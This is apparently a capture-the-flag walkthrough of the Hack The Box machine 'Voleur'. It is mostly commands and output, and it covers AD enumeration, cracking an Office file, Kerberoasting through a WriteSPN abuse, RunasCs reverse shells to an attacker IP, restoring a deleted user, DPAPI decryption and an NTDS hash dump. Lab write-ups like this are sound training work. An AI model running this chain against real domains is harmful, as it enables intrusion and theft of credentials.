Voleur starts with credentials, but after a nmap you find NTLM is disabled. Using kerberos, we are able to get a bloodhound dump. Checking the shares reveals a xlsx file, we can convert it and crack it. Once done, we get access to a excel file with some users and passwords, one user has be deleted. Once on the box, we lateral move to ldap_svc, and find a user that has been deleted. Using powershell, we restore them and then get a shell using the password found from the xlsx file. Then we do to the next directory in the IT share, and find a archived users directory which hold DPAPI credentials. After obtaining the credentials, we find our user able to access a backup in the next directory that contains the SAM, SECURITY, and NTDS files used to dump the Administrator hash.

As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account: ryan.naylor / HollowOct31Nyt

Initial Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-08-19 09:21:15Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
2222/tcp open  ssh           syn-ack ttl 127 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC+vH6cIy1hEFJoRs8wB3O/XIIg4X5gPQ8XIFAiqJYvSE7viX8cyr2UsxRAt0kG2mfbNIYZ+80o9bpXJ/M2Nhv1VRi4jMtc+5boOttHY1CEteMGF6EF6jNIIjVb9F5QiMiNNJea1wRDQ2buXhRoI/KmNMp+EPmBGB7PKZ+hYpZavF0EKKTC8HEHvyYDS4CcYfR0pNwIfaxT57rSCAdcFBcOUxKWOiRBK1Rv8QBwxGBhpfFngayFj8ewOOJHaqct4OQ3JUicetvox6kG8si9r0GRigonJXm0VMi/aFvZpJwF40g7+oG2EVu/sGSR6d6t3ln5PNCgGXw95pgYR4x9fLpn/OwK6tugAjeZMla3Mybmn3dXUc5BKqVNHQCMIS6rlIfHZiF114xVGuD9q89atGxL0uTlBOuBizTaF53Z//yBlKSfvXxW4ShH6F8iE1U8aNY92gUejGclVtFCFszYBC2FvGXivcKWsuSLMny++ZkcE4X7tUBQ+CuqYYK/5TfxmIs=
|   256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMkGDGeRmex5q16ficLqbT7FFvQJxdJZsJ01vdVjKBXfMIC/oAcLPRUwu5yBZeQoOvWF8yIVDN/FJPeqjT9cgxg=
|   256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILv295drVe3lopPEgZsjMzOVlk4qZZfFz1+EjXGebLCR
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 48495/tcp): CLEAN (Timeout)
|   Check 2 (port 27736/tcp): CLEAN (Timeout)
|   Check 3 (port 60782/udp): CLEAN (Timeout)
|   Check 4 (port 36910/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2025-08-19T09:21:18
|_  start_date: N/A
|_clock-skew: 59m59s

Since this is a windows environment, we can start with the simple AD enumeration.

LDAP

With credentials, we can get a dump for bloodhound.

1
konoha# bloodhound-python -d voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -ns 10.10.11.76 --zip -c Group,LocalAdmin,Session,Trusts,DCOM,RDP,PSRemote,LoggedOn,Container,ObjectProps,ACL --disable-autogc --dns-timeout 20 -dc DC.voleur.htb -k -no-pass

Checking the user descriptions for any juice details.

1
2
3
4
5
6
7
8
9
10
11
konoha# nxc ldap DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --use-kcache -M get-desc-users
LDAP        DC.voleur.htb   389    DC               [*] None (name:DC) (domain:voleur.htb)
LDAP        DC.voleur.htb   389    DC               [+] voleur.htb\ryan.naylor from ccache
GET-DESC... DC.voleur.htb   389    DC               [+] Found following users:
GET-DESC... DC.voleur.htb   389    DC               User: Administrator description: Built-in account for administering the computer/domain
GET-DESC... DC.voleur.htb   389    DC               User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... DC.voleur.htb   389    DC               User: krbtgt description: Key Distribution Center Service Account
GET-DESC... DC.voleur.htb   389    DC               User: ryan.naylor description: First-Line Support Technician
GET-DESC... DC.voleur.htb   389    DC               User: marie.bryant description: First-Line Support Technician
GET-DESC... DC.voleur.htb   389    DC               User: lacey.miller description: Second-Line Support Technician
GET-DESC... DC.voleur.htb   389    DC               User: jeremy.combs description: Third-Line Support Technician

Well we have some groups, we can take a note of these and come back later.

  • Restore_Users
  • First-Line Support Technicians
  • FIrst-Line Technicians

SMB

Let’s check out what shares we have available to us.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
konoha# nxc smb DC.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --shares
SMB         DC.voleur.htb   445    DC               [*]  x64 (name:DC) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.voleur.htb   445    DC               [+] VOLEUR.HTB\ryan.naylor from ccache
SMB         DC.voleur.htb   445    DC               [*] Enumerated shares
SMB         DC.voleur.htb   445    DC               Share           Permissions     Remark
SMB         DC.voleur.htb   445    DC               -----           -----------     ------
SMB         DC.voleur.htb   445    DC               ADMIN$                          Remote Admin
SMB         DC.voleur.htb   445    DC               C$                              Default share
SMB         DC.voleur.htb   445    DC               Finance
SMB         DC.voleur.htb   445    DC               HR
SMB         DC.voleur.htb   445    DC               IPC$            READ            Remote IPC
SMB         DC.voleur.htb   445    DC               IT              READ
SMB         DC.voleur.htb   445    DC               NETLOGON        READ            Logon server share
SMB         DC.voleur.htb   445    DC               SYSVOL          READ            Logon server share

Connecting via SMB.

1
2
3
4
5
6
7
konoha# impacket-smbclient 'voleur.htb/ryan.naylor@DC.voleur.htb' -k -no-pass -dc-ip 10.10.11.76
<SNIP>
# ls
drw-rw-rw-          0  Wed Jan 29 03:40:17 2025 .
drw-rw-rw-          0  Wed Jan 29 03:10:01 2025 ..
-rw-rw-rw-      16896  Thu May 29 17:23:36 2025 Access_Review.xlsx
# mget *

From the IT share got Access_Review.xlsx, we can convert it to a hash and try to crack.

1
2
3
4
5
6
7
8
9
konoha# office2john Access_Review.xlsx > access.hash
konoha# john --wordlist=/usr/share/wordlists/rockyou.txt access.hash
Using default input encoding: UTF-8
Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 AVX 4x / SHA512 128/128 AVX 2x AES])
Cost 1 (MS Office version) is 2013 for all loaded hashes
Cost 2 (iteration count) is 100000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<SNIP>        (Access_Review.xlsx)

After cracking and opening. We have passwords and a user that was deleted(Possibly can restore him).

Looking at svc_ldap they has permission WriteSPN over svc_winrm. After setting with bloodyAD we can GetUserSPNs again for svc_winrm’s hash.

1
2
3
konoha# bloodyAD -v DEBUG -d voleur.htb -u svc_ldap  -k --dc-ip 10.10.11.76 --host DC.voleur.htb set object svc_winrm servicePrincipalName -v HOST/svc_winrm

konoha# impacket-GetUserSPNs -dc-ip 10.10.11.76 'voleur.htb/svc_ldap' -request-user svc_winrm -k -no-pass -outputfile svc_winrm

svc_winrm password cracks and we get a TGT and WinRM on the box.

On Box

As svc_winrm, we need to use RunaCs.exe to give ourself a shell as svc_ldap. 

1
2
3
4
5
6
*Evil-WinRM* PS C:\programdata> .\RCs.exe svc_ldap M1XyC9pW7qT5Vn powershell -r 10.10.14.2:443 -t 0
[*] Warning: The logon for user 'svc_ldap' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-2d33258$\Default
[+] Async process 'C:\ProgramData\ms.exe' with pid 2796 created in background.

As svc_ldap, we need find DeletedObjects using powershell.

1
2
3
4
5
6
7
8
PS C:\Windows\system32> Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' -IncludeDeletedObjects -Properties objectSid, lastKnownParent, ObjectGUID | Select-Object Name, ObjectGUID, objectSid, lastKnownParent | Format-List


Name            : Todd Wolfe
                  DEL:1c6b1deb-c372-4cbb-87b1-15031de169db
ObjectGUID      : 1c6b1deb-c372-4cbb-87b1-15031de169db
objectSid       : S-1-5-21-3927696377-1337352550-2781715495-1110
lastKnownParent : OU=Second-Line Support Technicians,DC=voleur,DC=htb

Then restore this object(user).

1
PS C:\Windows\system32> Restore-ADObject -Identity 1c6b1deb-c372-4cbb-87b1-15031de169db -TargetPath "OU=Second-Line Support Technicians,DC=voleur,DC=htb"

We can now get a shell as todd.wolfe same way as before.

1
2
3
4
5
6
*Evil-WinRM* PS C:\programdata> .\RCs.exe todd.wolfe NightT1meP1dg3on14 powershell -r 10.10.14.2:443 -t 0
[*] Warning: The logon for user 'todd.wolfe' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-e18972$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5340 created in background.

DPAPI AGAIN, Where in a home directory duh!!

After getting a shell we look into the IT directory at the root which has First,Second,Third OUs. We can go into the second and see a archived directory. This holds the Users Directory which we have access to ours. We can from this, gather the keys we need for DPAPI.

Exfiltrating the keys via smb didn’t work, Base64 encoding and then decrypting on attacker machine.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
konoha# impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password 'NightT1meP1dg3on14'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[MASTERKEYFILE]
Version     :        2 (2)
Guid        : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags       :        0 (0)
Policy      :        0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
konoha# impacket-dpapi credential -f 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type        : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target      : Domain:target=Jezzas_Account
Description :
Unknown     :
Username    : jeremy.combs
Unknown     : qT3V9pLXyN7W4m

After getting credentials we again get a shell like we did before.

1
2
3
4
5
6
*Evil-WinRM* PS C:\programdata> .\RCs.exe jeremy.combs qT3V9pLXyN7W4m powershell -r 10.10.14.2:443 -t 0
[*] Warning: The logon for user 'jeremy.combs' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-e18972$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 3564 created in background.

Backing it up

Now going in to IT again we have the Third directory. Which contains backups, SECURITY, SYSTEM, and if we go into the Active Directory folder we find the ntds.dit. With all these transferred to our machine we can decode and get the Administrator hash.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
konoha# impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:759d6c7b27b4c7c4feda8909bc656985b457ea8d7cee9e0be67971bcb648008804103df46ed40750e8d3be1a84b89be42a27e7c0e2d0f6437f8b3044e840735f37ba5359abae5fca8fe78959b667cd5a68f2a569b657ee43f9931e2fff61f9a6f2e239e384ec65e9e64e72c503bd86371ac800eb66d67f1bed955b3cf4fe7c46fca764fb98f5be358b62a9b02057f0eb5a17c1d67170dda9514d11f065accac76de1ccdb1dae5ead8aa58c639b69217c4287f3228a746b4e8fd56aea32e2e8172fbc19d2c8d8b16fc56b469d7b7b94db5cc967b9ea9d76cc7883ff2c854f76918562baacad873958a7964082c58287e2
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77
[*] DPAPI_SYSTEM
dpapi_machinekey:0x5d117895b83add68c59c7c48bb6db5923519f436
dpapi_userkey:0xdce451c1fdc323ee07272945e3e0013d5a07d1c3
[*] NL$KM
 0000   06 6A DC 3B AE F7 34 91  73 0F 6C E0 55 FE A3 FF   .j.;..4.s.l.U...
 0010   30 31 90 0A E7 C6 12 01  08 5A D0 1E A5 BB D2 37   01.......Z.....7
 0020   61 C3 FA 0D AF C9 94 4A  01 75 53 04 46 66 0A AC   a......J.uS.Ff..
 0030   D8 99 1F D3 BE 53 0C CF  6E 2A 4E 74 F2 E9 F2 EB   .....S..n*Nt....
NL$KM:066adc3baef73491730f6ce055fea3ff3031900ae7c61201085ad01ea5bbd23761c3fa0dafc9944a0175530446660aacd8991fd3be530ccf6e2a4e74f2e9f2eb
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>